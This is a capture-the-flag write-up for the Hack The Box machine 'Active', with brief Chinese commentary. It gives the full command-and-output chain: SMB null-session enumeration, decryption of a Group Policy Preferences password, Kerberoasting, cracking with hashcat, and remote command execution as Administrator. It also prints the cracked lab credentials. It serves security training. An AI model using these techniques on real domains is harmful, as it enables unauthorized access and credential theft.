Active
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nmap 10.129.23.173 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-19 10:52 EST
Warning: 10.129.23.173 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.23.173
Host is up (0.55s latency).
Not shown: 63806 closed tcp ports (reset), 1706 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49171/tcp open unknown
49173/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 45.19 seconds
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u guest -p '' --generate-hosts-file hosts
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [-] active.htb\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat hosts
10.129.23.173 DC.active.htb active.htb DC
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u guest -p '' --generate-krb5-file /etc/krb5.conf
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [+] krb5 conf saved to: /etc/krb5.conf
SMB 10.129.23.173 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 10.129.23.173 445 DC [-] active.htb\guest: STATUS_ACCOUNT_DISABLED
1.2. SMB
SMB Null Session
禁止了 guest 用户登录 使用空用户枚举
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u guest -p '' --shares
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [-] active.htb\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u '' -p '' --shares
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [+] active.htb\:
SMB 10.129.23.173 445 DC [*] Enumerated shares
SMB 10.129.23.173 445 DC Share Permissions Remark
SMB 10.129.23.173 445 DC ----- ----------- ------
SMB 10.129.23.173 445 DC ADMIN$ Remote Admin
SMB 10.129.23.173 445 DC C$ Default share
SMB 10.129.23.173 445 DC IPC$ Remote IPC
SMB 10.129.23.173 445 DC NETLOGON Logon server share
SMB 10.129.23.173 445 DC Replication READ
SMB 10.129.23.173 445 DC SYSVOL Logon server share
SMB 10.129.23.173 445 DC Users
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-smbclient 10.129.23.173
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Replication
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 active.htb
# cd active.htb
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Policies
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 scripts
# tree
/active.htb/DfsrPrivate/ConflictAndDeleted
/active.htb/DfsrPrivate/Deleted
/active.htb/DfsrPrivate/Installing
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/USER
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Finished - 28 files and folders
# get /active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
1.3. GPP Password
GPP Password
这是一个GPP留存密码
Groups.xml 中的 cpassword 使用的是微软固定的 AES 密钥加密,可以用 gpp-decrypt 解密得到明文密码
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u 'active.htb\SVC_TGS' -p GPPstillStandingStrong2k18
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
1.4. Bloodhound
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# bloodhound-ce-python -c All -p GPPstillStandingStrong2k18 -u 'SVC_TGS' -d active.htb -ns 10.129.23.173 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: active.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20251119111451_bloodhound.zip
没有啥用
1.5. SMB
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u 'active.htb\SVC_TGS' -p GPPstillStandingStrong2k18 --shares
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.23.173 445 DC [*] Enumerated shares
SMB 10.129.23.173 445 DC Share Permissions Remark
SMB 10.129.23.173 445 DC ----- ----------- ------
SMB 10.129.23.173 445 DC ADMIN$ Remote Admin
SMB 10.129.23.173 445 DC C$ Default share
SMB 10.129.23.173 445 DC IPC$ Remote IPC
SMB 10.129.23.173 445 DC NETLOGON READ Logon server share
SMB 10.129.23.173 445 DC Replication READ
SMB 10.129.23.173 445 DC SYSVOL READ Logon server share
SMB 10.129.23.173 445 DC Users READ
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-smbclient 'svc_tgs:GPPstillStandingStrong2k18@10.129.23.173'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# tree
/desktop.ini
/Default/AppData
/Default/Application Data
/Default/Cookies
/Default/Desktop
/Default/Documents
/Default/Downloads
/Default/Favorites
/Default/Links
/Default/Local Settings
/Default/Music
/Default/My Documents
/Default/NetHood
/Default/NTUSER.DAT
/Default/NTUSER.DAT.LOG
/Default/NTUSER.DAT.LOG1
/Default/NTUSER.DAT.LOG2
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
/Default/NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
/Default/Pictures
/Default/PrintHood
/Default/Recent
/Default/Saved Games
/Default/SendTo
/Default/Start Menu
/Default/Templates
/Default/Videos
/SVC_TGS/Contacts
/SVC_TGS/Desktop
/SVC_TGS/Downloads
/SVC_TGS/Favorites
/SVC_TGS/Links
/SVC_TGS/My Documents
/SVC_TGS/My Music
/SVC_TGS/My Pictures
/SVC_TGS/My Videos
/SVC_TGS/Saved Games
/SVC_TGS/Searches
/Default/AppData/Local
/Default/AppData/Roaming
/Default/Documents/My Music
/Default/Documents/My Pictures
/Default/Documents/My Videos
>>>> /SVC_TGS/Desktop/user.txt
/Default/AppData/Local/Application Data
/Default/AppData/Local/History
/Default/AppData/Local/Microsoft
/Default/AppData/Local/Temp
/Default/AppData/Local/Temporary Internet Files
/Default/AppData/Roaming/Microsoft
/Default/AppData/Local/Microsoft/Windows
/Default/AppData/Roaming/Microsoft/Internet Explorer
/Default/AppData/Roaming/Microsoft/Windows
/Default/AppData/Local/Microsoft/Windows/GameExplorer
/Default/AppData/Local/Microsoft/Windows/History
/Default/AppData/Local/Microsoft/Windows/Temporary Internet Files
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch
/Default/AppData/Roaming/Microsoft/Windows/Cookies
/Default/AppData/Roaming/Microsoft/Windows/Network Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Printer Shortcuts
/Default/AppData/Roaming/Microsoft/Windows/Recent
/Default/AppData/Roaming/Microsoft/Windows/SendTo
/Default/AppData/Roaming/Microsoft/Windows/Start Menu
/Default/AppData/Roaming/Microsoft/Windows/Templates
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/desktop.ini
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Server Manager.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Shows Desktop.lnk
/Default/AppData/Roaming/Microsoft/Internet Explorer/Quick Launch/Window Switcher.lnk
/Default/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Compressed (zipped) Folder.ZFSendToTarget
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop (create shortcut).DeskLink
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/SendTo/Mail Recipient.MAPIMail
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs
/Default/AppData/Roaming/Microsoft/Windows/Recent/CustomDestinations/590aee7bdd69b59b.customDestinations-ms
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Command Prompt.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Notepad.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Run.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Windows Explorer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Maintenance/Help.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Desktop.ini
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Ease of Access.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Magnify.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/Narrator.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/Accessibility/On-Screen Keyboard.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/computer.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Control Panel.lnk
/Default/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Accessories/System Tools/Desktop.ini
Finished - 100 files and folders
# get /SVC_TGS/Desktop/user.txt
2. System
2.1. Kerberoasting
Kerberoasting
看名字就知道这个账号是一个服务账号,能枚举/请求所有带 SPN 的账户,这里可以获取对应的域用户krb5tgs哈希(服务票据哈希)
impacket-GetUserSPNs
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# impacket-GetUserSPNs -k -no-pass 'active.htb/SVC_TGS@10.129.23.173' -dc-host DC.active.htb -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2025-11-19 10:49:38.760543
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$504e6baca68dc696665572b9315097cf$e8b55f1a65caadd4edd8fac9fd826faf8b738164424d322f2d112235dc75ca5639889125da9563c011c399f1049b1658ab5f89da1d69bcc5634dca0b957949890c4e12fa8f7266e1874bd8875b3aa77fcfe108040ffb9018f708033bb37bcca7e222a0c398f08831e5799ec4b4628e88be4f6ffcd06b8c684c3b5ae507cd23ba9e36a91109e9982bf8b938841b4b54cc64882d9daaf1411b2ceeac7ed58e7a04985b5a386ebed88ecc55d70a3963cbbaf03f05ea13a8c3db09a04622e65b1f5e21a888405d83804d48ba8dc14eda7e172910da37e67c0331b1a31ae248f7c36c447455799847a1312412e7a76b372031cc064e0e8ed50f7968b4b91c6f43716c6f7956d2260ff5e653904be2609f6e51afe25412f54cf7df7b6694126a2af3a29c97ac932ff45bf737d04bfa4de4eda710d15dfb189074e54cae7a7574e099674e8627d3e089eebbd41b8d550fe883a2afff0f0e34723cdcca60a8ffe52052a90b25d4097eb8f208ca727fdb1ce6efd715ed1cd3bbbd396dcba099f7230658a0d3d8244b5d4c2540b34f29ac70159cdbd18c813bfcd0e9c402b9943653e6ceaf5e95e071705aa355a298a38a954c119a4bf63fffe9c78121e7990552f1356867ccef6ddf8a20b937f4e3de0a76645de33cea862a8310bc6b11f5d9938bdcba4923330401c8d6602548c6ef0743648ef3b1677bf238b69da268618f7a50e438b86661becca7873235fc2f5c27a62c831cedac350689859d6877d9d765692d84d444a8e5cc22a609d15d8da6a269ab6ff6194f0f6de70db7e5e1d119ecff72a271f8e330ad1f8bfbb4a5abd9198e9ad08ca8b1c80357acf02c4809d5b529e74cd89491c7091fe129fdfb1c3b7090249d514b3ed735af9c2c61f7fe8371b1e25e0b0230d682d4f63d76c92c8ee0a1208873217c75ee62e911aed913677c37cd2f5cf4b6714bd33f59844d104bbcc4f37a44b73086be8dedd3cdc9c17f41519e098f1a80f0229bb2951f20bc07cecd47c005826d448d79f860623bc62347b157f1d7a8a9940c8c3bee1c34c001cc3399bc77db81ab730d33596cf9401c7041591ca0bc00855d7c1a688cb8c27691873e1100fcb9983faff9755c05422e83ce5b8c77fe657058c271611c12829ef513d60c5b82e8a4beef821b878e77f32a442a24829adb9b80f5cdfb15617dc0b4e4b5c10ba0e97319570ed4b3c06d0478c6445356f9732159a813474ca30f1dec2f82fbbd8ea58e65f82098acc921
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$504e6baca68dc696665572b9315097cf$e8b55f1a65caadd4edd8fac9fd826faf8b738164424d322f2d112235dc75ca5639889125da9563c011c399f1049b1658ab5f89da1d69bcc5634dca0b957949890c4e12fa8f7266e1874bd8875b3aa77fcfe108040ffb9018f708033bb37bcca7e222a0c398f08831e5799ec4b4628e88be4f6ffcd06b8c684c3b5ae507cd23ba9e36a91109e9982bf8b938841b4b54cc64882d9daaf1411b2ceeac7ed58e7a04985b5a386ebed88ecc55d70a3963cbbaf03f05ea13a8c3db09a04622e65b1f5e21a888405d83804d48ba8dc14eda7e172910da37e67c0331b1a31ae248f7c36c447455799847a1312412e7a76b372031cc064e0e8ed50f7968b4b91c6f43716c6f7956d2260ff5e653904be2609f6e51afe25412f54cf7df7b6694126a2af3a29c97ac932ff45bf737d04bfa4de4eda710d15dfb189074e54cae7a7574e099674e8627d3e089eebbd41b8d550fe883a2afff0f0e34723cdcca60a8ffe52052a90b25d4097eb8f208ca727fdb1ce6efd715ed1cd3bbbd396dcba099f7230658a0d3d8244b5d4c2540b34f29ac70159cdbd18c813bfcd0e9c402b9943653e6ceaf5e95e071705aa355a298a38a954c119a4bf63fffe9c78121e7990552f1356867ccef6ddf8a20b937f4e3de0a76645de33cea862a8310bc6b11f5d9938bdcba4923330401c8d6602548c6ef0743648ef3b1677bf238b69da268618f7a50e438b86661becca7873235fc2f5c27a62c831cedac350689859d6877d9d765692d84d444a8e5cc22a609d15d8da6a269ab6ff6194f0f6de70db7e5e1d119ecff72a271f8e330ad1f8bfbb4a5abd9198e9ad08ca8b1c80357acf02c4809d5b529e74cd89491c7091fe129fdfb1c3b7090249d514b3ed735af9c2c61f7fe8371b1e25e0b0230d682d4f63d76c92c8ee0a1208873217c75ee62e911aed913677c37cd2f5cf4b6714bd33f59844d104bbcc4f37a44b73086be8dedd3cdc9c17f41519e098f1a80f0229bb2951f20bc07cecd47c005826d448d79f860623bc62347b157f1d7a8a9940c8c3bee1c34c001cc3399bc77db81ab730d33596cf9401c7041591ca0bc00855d7c1a688cb8c27691873e1100fcb9983faff9755c05422e83ce5b8c77fe657058c271611c12829ef513d60c5b82e8a4beef821b878e77f32a442a24829adb9b80f5cdfb15617dc0b4e4b5c10ba0e97319570ed4b3c06d0478c6445356f9732159a813474ca30f1dec2f82fbbd8ea58e65f82098acc921:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...acc921
Time.Started.....: Thu Nov 20 00:25:59 2025 (0 secs)
Time.Estimated...: Thu Nov 20 00:25:59 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16541.8 kH/s (6.15ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 47c Util: 25% Core:1890MHz Mem:8001MHz Bus:8
┌──(root㉿kali)-[~/Desktop/htb/Active]
└─# nxc smb 10.129.23.173 -u administrator -p Ticketmaster1968 -x "type c:\users\administrator\desktop\root.txt"
SMB 10.129.23.173 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.23.173 445 DC [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB 10.129.23.173 445 DC [+] Executed command via wmiexec
SMB 10.129.23.173 445 DC 663fcafcfb4ed067f71039e46f5c249e